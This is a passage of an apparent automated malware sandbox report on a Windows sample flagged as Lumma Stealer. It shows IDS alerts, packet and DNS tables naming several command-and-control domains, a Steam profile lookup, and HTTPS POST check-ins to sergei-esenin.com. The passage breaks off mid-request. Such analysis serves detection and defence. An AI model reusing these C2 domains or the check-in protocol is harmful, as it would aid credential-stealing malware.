                                  2024-10-13T06:54:07.280214+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.5631641.1.1.153UDP
                                  2024-10-13T06:54:08.962762+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549704104.102.49.254443TCP
                                  2024-10-13T06:54:09.743288+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705104.21.53.8443TCP
                                  2024-10-13T06:54:09.743288+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.53.8443TCP
                                  2024-10-13T06:54:10.829268+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.53.8443TCP
                                  2024-10-13T06:54:10.829268+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.53.8443TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 13, 2024 06:54:07.305222988 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:07.305243969 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:07.305613995 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:07.307353973 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:07.307364941 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.014677048 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.014782906 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.076718092 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.076742887 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.077764034 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.126260996 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.498770952 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.539479971 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.962838888 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.962901115 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.962928057 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.962939978 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.962960958 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.962970972 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.962977886 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.963009119 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.963062048 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.963062048 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:08.963073969 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:08.963088036 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.017244101 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.093718052 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.093755960 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.093806982 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.094233990 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.094233990 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.094249010 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.094281912 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.094876051 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.100421906 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.100604057 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.100611925 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.100704908 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.100737095 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.100776911 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.101516962 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.101516962 CEST49704443192.168.2.5104.102.49.254
                                  Oct 13, 2024 06:54:09.101541996 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.101551056 CEST44349704104.102.49.254192.168.2.5
                                  Oct 13, 2024 06:54:09.127770901 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.127805948 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.128837109 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.128837109 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.128875017 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.606651068 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.606864929 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.609335899 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.609344006 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.609738111 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.610896111 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.610939980 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.610982895 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.743305922 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.743472099 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.743530989 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.743541002 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.743613005 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.743782043 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.743788958 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.743803978 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.743891954 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.746742010 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.746750116 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.746768951 CEST49705443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.746787071 CEST44349705104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.881758928 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.881778955 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:09.881846905 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.882256031 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:09.882266998 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:10.372764111 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:10.372878075 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:10.374120951 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:10.374129057 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:10.374445915 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:10.375978947 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:10.376327038 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:10.376353979 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:10.829317093 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:10.829627037 CEST44349706104.21.53.8192.168.2.5
                                  Oct 13, 2024 06:54:10.829845905 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:10.848452091 CEST49706443192.168.2.5104.21.53.8
                                  Oct 13, 2024 06:54:10.848478079 CEST44349706104.21.53.8192.168.2.5

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 13, 2024 06:54:07.200212002 CEST6061053192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.209062099 CEST53606101.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.212394953 CEST5807253192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.225229979 CEST53580721.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.227365971 CEST6107353192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.236216068 CEST53610731.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.238202095 CEST5633553192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.247613907 CEST53563351.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.249675989 CEST6501153192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.258575916 CEST53650111.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.260004997 CEST5498953192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.268588066 CEST53549891.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.269826889 CEST5257953192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.278673887 CEST53525791.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.280214071 CEST6316453192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.288796902 CEST53631641.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:07.292706013 CEST6034253192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:07.299329996 CEST53603421.1.1.1192.168.2.5
                                  Oct 13, 2024 06:54:09.103883982 CEST6519453192.168.2.51.1.1.1
                                  Oct 13, 2024 06:54:09.114906073 CEST53651941.1.1.1192.168.2.5

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Oct 13, 2024 06:54:07.200212002 CEST192.168.2.51.1.1.10xbfeStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.212394953 CEST192.168.2.51.1.1.10xfe82Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.227365971 CEST192.168.2.51.1.1.10x9b63Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.238202095 CEST192.168.2.51.1.1.10xfa25Standard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.249675989 CEST192.168.2.51.1.1.10x539dStandard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.260004997 CEST192.168.2.51.1.1.10x5bc6Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.269826889 CEST192.168.2.51.1.1.10x95faStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.280214071 CEST192.168.2.51.1.1.10x6679Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.292706013 CEST192.168.2.51.1.1.10xb37eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:09.103883982 CEST192.168.2.51.1.1.10xf6dcStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Oct 13, 2024 06:54:07.209062099 CEST1.1.1.1192.168.2.50xbfeName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.225229979 CEST1.1.1.1192.168.2.50xfe82Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.236216068 CEST1.1.1.1192.168.2.50x9b63Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.247613907 CEST1.1.1.1192.168.2.50xfa25Name error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.258575916 CEST1.1.1.1192.168.2.50x539dName error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.268588066 CEST1.1.1.1192.168.2.50x5bc6Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.278673887 CEST1.1.1.1192.168.2.50x95faName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.288796902 CEST1.1.1.1192.168.2.50x6679Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:07.299329996 CEST1.1.1.1192.168.2.50xb37eNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:09.114906073 CEST1.1.1.1192.168.2.50xf6dcNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                  Oct 13, 2024 06:54:09.114906073 CEST1.1.1.1192.168.2.50xf6dcNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • steamcommunity.com
                                  • sergei-esenin.com

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704104.102.49.2544437140C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  2024-10-13 04:54:08 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  2024-10-13 04:54:08 UTC1870INHTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Sun, 13 Oct 2024 04:54:08 GMT
                                  Content-Length: 34837
                                  Connection: close
                                  Set-Cookie: sessionid=0baa650966fc0dfdba08ab88; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                  2024-10-13 04:54:08 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                  2024-10-13 04:54:09 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                  Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                  2024-10-13 04:54:09 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                  Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                  2024-10-13 04:54:09 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.549705104.21.53.84437140C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  2024-10-13 04:54:09 UTC264OUTPOST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: sergei-esenin.com
                                  2024-10-13 04:54:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                  Data Ascii: act=life
                                  2024-10-13 04:54:09 UTC553INHTTP/1.1 200 OK
                                  Date: Sun, 13 Oct 2024 04:54:09 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i65Q868U7Enr8cfo2eCei%2BtScT5TX3nW%2FcKTWUb5cLeXkCCFVrHLnFJiEAylCw8Zo87uYH3h1VBRA1hX3gX6kUWMByeHvGHvqu04Fd79SLuRMUGqbRmPpoujKwclLB%2FwHxhlmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8d1cbae69b584304-EWR
                                  2024-10-13 04:54:09 UTC816INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                  Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                  2024-10-13 04:54:09 UTC1369INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                  Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                  2024-10-13 04:54:09 UTC1369INData Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
                                  Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
                                  2024-10-13 04:54:09 UTC887INData Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                  Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                  2024-10-13 04:54:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.549706104.21.53.84437140C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  2024-10-13 04:54:10 UTC354OUTPOST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=hBo.L319DdN_T0PJa7tYvjmaL4kOlNqAcP2mUK4xBAM-1728795249-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 52
                                  Host: sergei-esenin.com
